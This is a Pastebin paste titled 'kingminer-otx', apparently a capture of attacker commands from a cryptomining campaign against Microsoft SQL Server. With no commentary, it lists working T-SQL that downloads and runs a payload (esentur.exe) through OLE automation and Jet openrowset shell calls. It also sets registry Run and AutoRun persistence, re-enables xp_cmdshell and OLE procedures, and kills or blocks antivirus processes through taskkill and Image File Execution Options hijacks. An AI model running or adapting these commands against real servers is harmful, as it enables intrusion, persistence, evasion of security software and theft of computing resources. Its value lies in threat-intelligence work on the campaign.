daily pastebin goal
49%
SHARE
TWEET

kingminer-otx

a guest Apr 27th, 2018 246 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Installation:
  2. use master  
  3. go
  4. DECLARE @js int
  5. EXEC sp_OACreate 'ScriptControl',@js OUT
  6. EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
  7. EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\Windows\temp\esentur.exe",2);var r = new ActiveXObject("WScript.Shell");r.Run("C:\Windows\temp\esentur.exe");'
  8.  
  9. go
  10. DECLARE @sq int EXEC sp_oacreate [wscript.shell], @sq out;
  11. EXEC sp_oamethod @sq,[run], NULL, [C:\Windows\temp\esentur.exe]
  12.  
  13. go
  14. declare @cmd2w INT;exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@cmd2w output;
  15. exec sp_oamethod @cmd2w,'run',null,'C:\Windows\temp\esentur.exe','0'
  16.  
  17.  
  18. go
  19. Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  20.  
  21. go
  22. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("C:\Windows\temp\esentur.exe")')
  23.  
  24. go
  25. Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\dnary.mdb','select shell("C:\Windows\temp\esentur.exe")')
  26.  
  27. go
  28. declare @hr int
  29. declare @object int;declare @property int
  30. exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
  31. exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
  32.  
  33. go
  34. select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("C:\Windows\temp\esentur.exe")')
  35.  
  36. go
  37. declare @hr int;declare @object int;declare @property int;exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT;
  38. exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\Progra~1\NetMeeting\uticl.xml'
  39.  
  40. go
  41. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\Progra~1\NetMeeting\uticl.xml','select shell("C:\Windows\temp\esentur.exe")')
  42.  
  43. go
  44. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','C:\Windows\temp\esentur.exe'
  45.  
  46. go
  47. exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Command Processor','AutoRun','REG_sz','C:\Windows\temp\esentur.exe'
  48.  
  49. go
  50. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows','shell','REG_SZ','C:\Windows\temp\esentur.exe'
  51.  
  52. go
  53. DECLARE @ObjectToken INT
  54. EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
  55. EXEC sp_OASetProperty @ObjectToken, 'Type', 1
  56. EXEC sp_OAMethod @ObjectToken, 'Open'
  57. EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x16jinzhi
  58. EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\Windows\temp\esentur.vbs', 2
  59. EXEC sp_OAMethod @ObjectToken, 'Close'
  60. EXEC sp_OADestroy @ObjectToken
  61. go
  62. DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\Windows\temp\esentur.vbs'
  63. go
  64.  
  65. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("C:\Windows\temp\esentur.vbs")')
  66.  
  67. go
  68.  
  69. declare @hr int
  70. declare @object int;declare @property int
  71. exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
  72. exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
  73. go
  74.  
  75. select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("C:\Windows\temp\esentur.vbs")')
  76.  
  77.  
  78. Post Install:
  79. SET ANSI_NULLS ON              
  80. SET ANSI_WARNINGS ON
  81. go
  82. sp_configure 'allow updates', 1
  83. go
  84. RECONFIGURE WITH OVERRIDE
  85. go
  86. EXEC sp_configure 'show advanced options', 1
  87. go
  88. RECONFIGURE
  89. go
  90. RECONFIGURE WITH OVERRIDE
  91. go
  92. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
  93. 'xp_cmdshell', 1;RECONFIGURE;
  94. go
  95. sp_configure 'show advanced options',1
  96. go
  97. RECONFIGURE WITH OVERRIDE
  98. go
  99. reconfigure
  100. go
  101. RECONFIGURE WITH OVERRIDE
  102.  
  103. go
  104. sp_configure 'xp_cmdshell',1
  105. go
  106. RECONFIGURE WITH OVERRIDE
  107. go
  108. reconfigure
  109. go
  110. RECONFIGURE WITH OVERRIDE
  111. go
  112. exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
  113. 'Ad Hoc Distributed Queries',1;RECONFIGURE;
  114. go
  115.  
  116. exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
  117. 'Ole Automation Procedures',1;RECONFIGURE;
  118. go
  119. sp_configure 'show advanced options', 1;
  120. go
  121. RECONFIGURE;
  122. go
  123.  
  124. RECONFIGURE WITH OVERRIDE
  125. go
  126. sp_configure 'Ole Automation Procedures', 1;
  127. go
  128. RECONFIGURE;
  129. go
  130. RECONFIGURE WITH OVERRIDE
  131. go
  132. EXEC sp_configure N'show advanced options', N'1'
  133. RECONFIGURE WITH OVERRIDE
  134. EXEC sp_configure N'xp_cmdshell', N'1'
  135. RECONFIGURE WITH OVERRIDE
  136. EXEC sp_configure N'show advanced options', N'0'
  137. RECONFIGURE WITH OVERRIDE
  138. go
  139. EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH OVERRIDE;--
  140. go
  141. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
  142. go
  143.  
  144.  
  145. DROP PROCEDURE sp_addextendedproc;DROP PROCEDURE sp_dropextendedproc
  146. go
  147. create procedure sp_addextendedproc --- 1996/08/30 20:13
  148. @functname nvarchar(517),/* (owner.)name of function to call */
  149. @dllname varchar(255)/* name of DLL containing function */
  150. as
  151. set implicit_transactions off
  152. if @@trancount > 0
  153. begin
  154. raiserror(15002,-1,-1,'sp_addextendedproc')
  155. return (1)
  156. end
  157. dbcc addextendedproc( @functname, @dllname)
  158. return (0) -- sp_addextendedproc
  159. GO
  160.  
  161. go
  162. create procedure dbo.sp_dropextendedproc
  163. @functname nvarchar(517) -- name of function
  164. as
  165. -- If we're in a transaction, disallow the dropping of the
  166. -- extended stored procedure.
  167. set implicit_transactions off
  168. if @@trancount > 0
  169. begin
  170. raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
  171. return (1)
  172. end
  173.  
  174. -- Drop the extended procedure mapping.
  175. dbcc dropextendedproc( @functname )
  176. return (0) -- sp_dropextendedproc
  177. go
  178. dbcc dropextendedproc ("xp_cmdshell")
  179. go
  180. drop PROCEDURE sp_OACreate
  181. drop PROCEDURE xp_cmdshell
  182. drop PROCEDURE xp_dirtree
  183. drop PROCEDURE sp_oamethod
  184. drop PROCEDURE xp_regaddmultistring
  185. drop PROCEDURE xp_regdeletekey
  186. drop PROCEDURE xp_regdeletevalue
  187. drop PROCEDURE xp_regenumvalues
  188. drop PROCEDURE xp_regread
  189. drop PROCEDURE xp_regwrite
  190. drop PROCEDURE xp_makewebtask
  191.  
  192.  
  193. go
  194. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  195. go
  196. USE master;
  197. EXEC sp_configure 'show advanced options', 1;
  198. RECONFIGURE WITH OVERRIDE;
  199. EXEC sp_configure 'Ole Automation Procedures', 1;
  200. RECONFIGURE WITH OVERRIDE;
  201. EXEC sp_configure 'show advanced options', 0;
  202. go
  203. EXEC sp_configure 'show advanced options', 1;
  204. RECONFIGURE;
  205. go
  206. EXEC sp_configure 'Ole Automation Procedures', 1;
  207. RECONFIGURE;
  208. go
  209. use master        
  210. exec sp_addextendedproc xp_dirtree,'xpstar.dll'    
  211. exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    
  212. exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    
  213. exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    
  214. exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    
  215. exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    
  216. exec sp_addextendedproc sp_OACreate,'odsole70.dll'    
  217. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    
  218. exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    
  219. exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    
  220. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    
  221. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    
  222. exec sp_addextendedproc sp_OAStop,'odsole70.dll'    
  223. exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    
  224. exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    
  225. exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    
  226. exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    
  227. exec sp_addextendedproc xp_regread,'xpstar.dll'    
  228. exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    
  229. exec sp_addextendedproc xp_regwrite,'xpstar.dll'    
  230. exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
  231. go
  232. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'  
  233. dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
  234. go
  235. DROP PROCEDURE sp_OAMethod;DROP PROCEDURE sp_OACreate;DROP PROCEDURE sp_OASetProperty;DROP PROCEDURE sp_OADestroy
  236. go
  237. exec sp_addextendedproc sp_OAMethod,'odsole70.dll';exec sp_addextendedproc sp_OACreate,'odsole70.dll';exec sp_addextendedproc sp_OASetProperty,'odsole70.dll';exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  238. go
  239. if(@@version like 'Microsoft SQL Server  2000%')
  240. use master;
  241. else
  242. exec sp_trace_setstatus 5, 0;
  243. go
  244. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))drop procedure sp_trace_setstatus
  245. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))drop procedure xp_regwrite
  246. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
  247. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
  248. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
  249. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
  250. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
  251. go
  252. create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);
  253. go
  254. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))dbcc addextendedproc ('sp_trace_setstatus','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))dbcc addextendedproc ('xp_regwrite','xpstar.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll')
  255. go
  256. EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';
  257. --sp_password
  258. GO
  259. EXEC sp_configure 'allow updates',1;
  260. RECONFIGURE WITH OVERRIDE;
  261. --sp_password
  262. GO
  263. EXEC sp_configure 'show advanced options', 1;
  264. RECONFIGURE WITH OVERRIDE;
  265. --sp_password
  266. GO
  267. EXEC sp_configure 'xp_cmdshell', 1;
  268. RECONFIGURE WITH OVERRIDE;
  269. --sp_password
  270. GO
  271. EXEC sp_configure 'Ad Hoc Distributed Queries',1;
  272. RECONFIGURE WITH override;
  273. --sp_password
  274. GO
  275. EXEC sp_configure 'Ole Automation Procedures',1;
  276. RECONFIGURE WITH override;
  277. --sp_password
  278. GO
  279. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  280. GO
  281. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
  282. GO
  283. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
  284. --sp_password
  285. GO
  286. exec xp_regdeletevalue 'HKEY_CURRENT_USER','Software\Policies\Microsoft\Windows\System','DisableCMD';
  287. exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Command Processor','AutoRun';
  288. exec xp_regdeletevalue 'HKEY_CURRENT_USER','SOFTWARE\Microsoft\Command Processor','AutoRun';
  289. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmd.exe';
  290. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\regini.exe';
  291. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\regsvr32.exe';
  292. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wscript.exe';
  293. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cscript.exe';
  294. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\secedit.exe';
  295. --sp_password
  296. GO
  297. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe';
  298. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secedit.exe';
  299. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe';
  300. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\script.exe';
  301. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe';
  302. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regsvr32.exe';
  303. --sp_password
  304. GO
  305. declare @hr int declare @object int declare @property int exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=svch0st.xml'
  306. --sp_password
  307. go
  308. declare @a varchar(8000);exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
  309. --sp_password
  310. go
  311. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'WbemScripting.SWbemLocator.1\CLSID', N'', REG_SZ, N'{76A64158-CB41-11D1-8B02-00600806D9B6}';
  312. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InprocServer32', N'', REG_SZ, N'C:\WINDOWS\system32\wbem\wbemdisp.dll';
  313. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\TypeLib', N'', REG_SZ, N'{565783C6-CB41-11D1-8B02-00600806D9B6}';
  314. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\ProgID', N'', REG_SZ, N'WbemScripting.SWbemLocator.1';
  315. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\Version', N'', REG_SZ, N'1.0';
  316. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\Programmable', N'', REG_SZ, N'';
  317. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\VersionIndependentProgID', N'', REG_SZ, N'WbemScripting.SWbemLocator';
  318. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'Microsoft.Jet.OLEDB.4.0\CLSID', N'', REG_SZ, N'{dee35070-506b-11cf-b1aa-00aa00b8de95}';
  319. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ExtendedErrors\{dee35071-506b-11cf-b1aa-00aa00b8de95}', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB ProviderError Lookup';
  320. go
  321. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\InprocServer32', N'', REG_SZ, N'C:\WINDOWS\system32\msjetoledb40.dll';
  322. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\OLE DB Provider', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB Provider';
  323. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ProgID', N'', EG_SZ, N'Microsoft.Jet.OLEDB.4.0';
  324. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\VersionIndependentProgID', N'', REG_SZ, N'Microsoft.Jet.OLEDB';
  325. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID', N'', REG_SZ, N'ADODB.Record.2.8';
  326. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32', N'', REG_SZ, N'C:\Progra~1\Common~1\System\ado\msado15.dll';
  327. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\VersionIndependentProgID', N'', REG_SZ, N'ADODB.Record';
  328. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32', N'', REG_SZ, N'C:\WINDOWS\system32\wshom.ocx';
  329. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'ADODB.Stream\CLSID', N'', REG_SZ, N'{00000566-0000-0010-8000-00AA006D2EA4}';
  330. exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  331. go
  332. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32', N'', REG_SZ, N'C:\WINDOWS\system32\wshom.ocx';
  333. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\FLAGS', N'', REG_SZ, N'0';
  334. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\HELPDIR', N'', REG_SZ, N'C:\WINDOWS\system32\';DROP PROCEDURE sp_password  declare @a varchar(8000);EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\', N'', REG_SZ, N'FileSystem Object';
  335. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InProcServer32', N'', REG_SZ, N'C:\WINDOWS\system32\scrrun.dll';
  336. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID', N'', REG_SZ, N'Scripting.FileSystemObject';
  337. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\TypeLib', N'', REG_SZ, N'{420B2830-E718-11CF-893D-00A0C9054228}';
  338. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\Version', N'', REG_SZ, N'1.0';
  339. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\', N'', REG_SZ, N'XML HTTP Request';
  340. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32', N'', REG_SZ, N'C:\WINDOWS\system32\msxml3.dll';
  341. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\ProgID', N'', REG_SZ, N'Microsoft.XMLHTTP.1.0';
  342. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\TypeLib', N'', REG_SZ, N'{D63E0CE2-A0A2-11D0-9C02-00C04FC99C8E}';
  343. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\VersionIndependentProgID', N'', REG_SZ, N'Microsoft.XMLHTTP';DROP PROCEDURE sp_password    
  344. go
  345. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ExtendedErrors\{dee35071-506b-11cf-b1aa-00aa00b8de95}', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB ProviderError Lookup'
  346. GO
  347. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\InprocServer32', N'', REG_SZ, N'C:\WINDOWS\system32\msjetoledb40.dll'
  348. GO
  349. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\OLE DB Provider', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB Provider'
  350. GO
  351. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ProgID', N'', REG_SZ, N'Microsoft.Jet.OLEDB.4.0'
  352. GO
  353. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\VersionIndependentProgID', N'', REG_SZ, N'Microsoft.Jet.OLEDB'
  354. GO
  355. EXEC xp_regwrite N'HKEY_LOCAL_MACHINE', N'SOFTWARE\Classes\CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ExtendedErrors\{dee35071-506b-11cf-b1aa-00aa00b8de95}', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB ProviderError Lookup';
  356. GO
  357. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  358. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360rp.exe /f'
  359. go
  360. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  361. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360sd.exe /f'
  362. go
  363. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  364. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360rps.exe /f'
  365. go
  366. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  367. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360tray.exe /f'
  368. go
  369. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  370. @shell,'run',null,'c:\windows\system32\cmd.exe /c ntsd -c q -pn 360rp.exe'
  371. go
  372. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  373. @shell,'run',null,'c:\windows\system32\cmd.exe /c ntsd -c q -pn 360sd.exe'
  374. go
  375. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  376. @shell,'run',null,'c:\windows\system32\cmd.exe /c ntsd -c q -pn 360rps.exe'
  377. go
  378. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rp.exe','Debugger','REG_SZ','taskkill.exe'
  379. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rps.exe','Debugger','REG_SZ','taskkill.exe'
  380. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe','Debugger','REG_SZ','taskkill.exe'
  381. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360sd.exe','Debugger','REG_SZ','taskkill.exe'
  382. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe','Debugger','REG_SZ','taskkill.exe'
  383. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Storm.exe','Debugger','REG_SZ','taskkill.exe'
  384. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe','Debugger','REG_SZ','taskkill.exe'
  385. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kwatch.exe','Debugger','REG_SZ','taskkill.exe'
  386. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe','Debugger','REG_SZ','taskkill.exe'
  387. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe','Debugger','REG_SZ','taskkill.exe'
  388. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe','Debugger','REG_SZ','taskkill.exe'
  389. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe','Debugger','REG_SZ','taskkill.exe'
  390. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe','Debugger','REG_SZ','taskkill.exe'
  391. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsafeTray.exe','Debugger','REG_SZ','taskkill.exe'
  392. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSWebShield.exe','Debugger','REG_SZ','taskkill.exe'
  393. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfp.exe','Debugger','REG_SZ','taskkill.exe'
